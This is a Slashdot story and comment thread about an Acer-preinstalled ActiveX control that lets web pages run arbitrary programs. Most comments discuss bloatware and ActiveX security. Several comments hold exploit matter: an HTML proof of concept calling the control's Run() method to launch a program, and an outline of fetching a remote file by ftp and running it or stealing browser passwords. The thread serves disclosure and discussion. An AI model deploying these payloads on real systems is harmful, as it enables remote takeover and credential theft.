Acer May Be Bugging Computers 396
tomjen writes "What if a well known laptop company had silently placed an ActiveX Control on their computers that allowed any webpage to execute any program? Well Acer apparently has and they have (based on the last modified-by date of the file) been doing this since 1998. 'Checking the interface of the control reveals it has a method named "Run()" as shown below. The method supports parameters "Drive", "FileName", and "CmdLine". Isn't it strange for a control that's marked "safe for scripting" to allow a method that is suggestive of possible abuse?'"
Aren't we a little late on this story? (Score:0, Informative)
2006-11-19 - Public Release.
Re:Phew! (Score:3, Informative)
present on Aspire 1690 (Score:3, Informative)
Re:Phew! (Score:4, Informative)
I don't know about SONY, but in my experience, HP are more generous than most in terms if disks included with their PCs.
Re:Phew! (Score:1, Informative)
Safe (Score:2, Informative)
Checked mine, its present :( Anyone know if its safe to make that file and its registry entry 'disappear' ?
Sure, just go get the Mepis Patch [mepis.org]. This will end all of your activeX problems. It won't end your Flash, Adobe and other problems but those are minor in comparison.
Really, do you think eliminating this one control will make your computer safe? Chances are there are coppies that will "respawn" later, a common malware trick, and that there are far nastier controls you don't know about. The malice is built in from Redmod before anyone else gets it.
Re:to those of us uneducated (Score:5, Informative)
Re:So can this be neutralized? (Score:3, Informative)
Re:to those of us uneducated (Score:4, Informative)
of script in a web page. Now I can possibly own most acer laptops visiting that page.
The script could do something like this
ftp somehost
ftp get somefile
execute somefile
Bingo I own your laptop.
Or say I just ftp your firefox data so I can grab your history, passwords etc.
Re:present on Aspire 1690 (Score:5, Informative)
Goto Start > Run and type:
regsvr32 -u lunchapp.ocx
(-u for uninstall)
Uhh, there already IS an exploit... (Score:5, Informative)
But as you can run ANY windows binary with any command line (at least according to the article), actual exploitation is trivial.
Late again! (Score:5, Informative)
Re:And now that it's publicized... (Score:5, Informative)
Re:Phew! (Score:4, Informative)
Re:Phew! (Score:1, Informative)
Re:So can this be neutralized? (Score:3, Informative)
Re:to those of us uneducated (Score:3, Informative)
@mozilla.org/process/util;1 (Score:4, Informative)
Re:Phew! (Score:5, Informative)
I recently bought a laptop with Ubuntu pre-installed from The Linux Store [thelinuxstore.ca], which is in Ontario. I've been perfectly satisfied aside from the minor point that they only offer the choice of Ubuntu and Fedora Core when I would have preferred Debian.
Re:I'm not impressed with this IE7 "improvement" (Score:3, Informative)
The hatred towards ActiveX is largely unfound. What would happen to sites like YouTube or movie sites, video, audio sites, if all browsers are suddenly rendered incapable of supporting plugins.
The mistake of Microsoft was that ActiveX were way too easy to install, and this is corrected in a major way in IE7.
In fact, the plugin API and extensions of Firefox can do just as much damage and much easier (since people trust those) than ActiveX can in IE7, with all default settings.
IE7 will at least ask you now if a page wants to run an *already installed* control. Does Firefox do this? No.
(of course there's the question: should it, but apparently due to jerks that preinstall craps on laptops, yea..)
Re:Phew! (Score:4, Informative)
$20 for the set of disks + $52.50(Dell refunded price for Windows) is about the same price you could buy Windows XP Home OEM version for.
Re:to those of us uneducated (Score:2, Informative)
Re:Wow (Score:2, Informative)
And actualy the lawsuite for spilt coffee and a million bucks entailed the coffee being so hot it melted the cup were the lid fastened to it causing the spill after the compnay had been informed of the issue repeatedly and refused to do anything about it. she was only asking for medical bills and the jurry added to it. So yes, in a way, I guess this kind of relates.
This type of stuff shouldn't be able to happen after how many exploits causing malicious harm to computers. I guess the solution might be for people to stop thinking they need to upgrade or replace thir system whenever thier computers starts acting "worn out" and "slow". If someone on the supply end stops making a buck from every replacment, they might be more concerned with stoping them from breaking.
Re:It's an appendix. (Score:3, Informative)
Like multiple camera angles on DVDs? There's even a 'camera' button taking up space on my remote.
That's BS (Score:4, Informative)
All you need to do is burn the images (DVDs) when you get the laptop, and Sony positively nags you repeatedly to do it. Also, if you leave the recovery partition in place you can do it again later.
As for getting the original DVDs, they don't charge a ridiculous amount (in the $60 region) but they do ask for a ridiculous amount of proof that it's your own laptop and you're not going to share the disks with the world..
Don't know about HP, but have handled enough Sony laptops
Re:to those of us uneducated (Score:5, Informative)
I really have a hard time understanding your mindset. You refuse to believe in the seriousness of the vuln even when people give you an attack vector example. Please, why ?
Re:present on Aspire 1690 (Score:2, Informative)
I'm not sure I'd want to create a page to do it tho, even with full permission from the user...
Re:Wow (Score:2, Informative)
Who's talking about an exploit? I can get people "infected" with XPI the same way people get "infected" by clicking "Yes" on that annoying ActiveX install dialog. It's much easier than trying to find an exploit. But we're drifting here - the issue is a PC vendor pre-installing something on my box. That's even easier, because it doesn't require user intervention!
but there are a number of things to prevent you from actually getting it installed.
Like what, a badly designed whitelist and a dialog where you have to click "No"? And you figure that the same people who used to click "Yes" on IE will click on "No" in Firefox, correct?
Until then, your full of hot air.
I think you're taking this too personally. Social engineering and stupidity are far more profitable for spammers and scammers than any exploit Microsoft could ever dream of.
Re:present on Aspire 1690 (Score:4, Informative)
hahaha.Run("c", "\\windows\\system32\\regsvr32.exe", "-u lunchapp.ocx")
?
Test/exploit code (Score:4, Informative)
<html>
<body>
<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3
</object>
<script>
hahaha.Run("c", "\\windows\\system32\\calc.exe", "");
</script>
</html>
</body>
Re:Phew! (Score:3, Informative)
I concur. I'm on my HP laptop right now, which is about 20 months old. It came with only one partition, so I had to format the entire thing when I got it to repartition it--I know I could have probably used something like Partition Magic, but I'm cheap and I wanted to uninstall all the cruft, like the Sonic garbage.
The upside is that it did some with a clean* (*HP OEM) Windows XP disk. Even though it was OEM, it gave me the option to keep most of the useless HP software off.
Beyond than, no problems yet. So I'm relatively pleased with HP for once.
Re:Phew! (Score:3, Informative)
Re:present on Aspire 1690 (Score:3, Informative)
Re:Phew! (Score:2, Informative)
It dates back to the Norman invasion of England, pork and beef are the Norman (french) words for those animals (porc and boeuf).
Same reason why we have redundant words like big/large.
Re:Phew! (Score:2, Informative)
On the other hand, if you walked into a restaurant and ordered 'Pig', you might get bacon, ham, or pork. Perhaps even a pork medallion wrapped in a strip of sweet, sweet bacon.
The variety of the animal available for consumption helps shape the ordering process. At least that's all I've got.
Question: is this another Acer backdoor? (Score:4, Informative)
P.S.: the article's backdoor was also present on my system. those bastards...
Re:Phew! (Score:3, Informative)
It dates back to the Norman invasion (no, not Spiney, but 1066). The (primarily Norman French) aristocracy called food by the french words -- boeuf, jambon (hence ham), etc. The stuff the peasants ate, or that nobody ate (eg horse), wasn't.
BTW, the word "poultry" is similar to the french word for chicken -- poulet.
Re:Question: is this another Acer backdoor? (Score:2, Informative)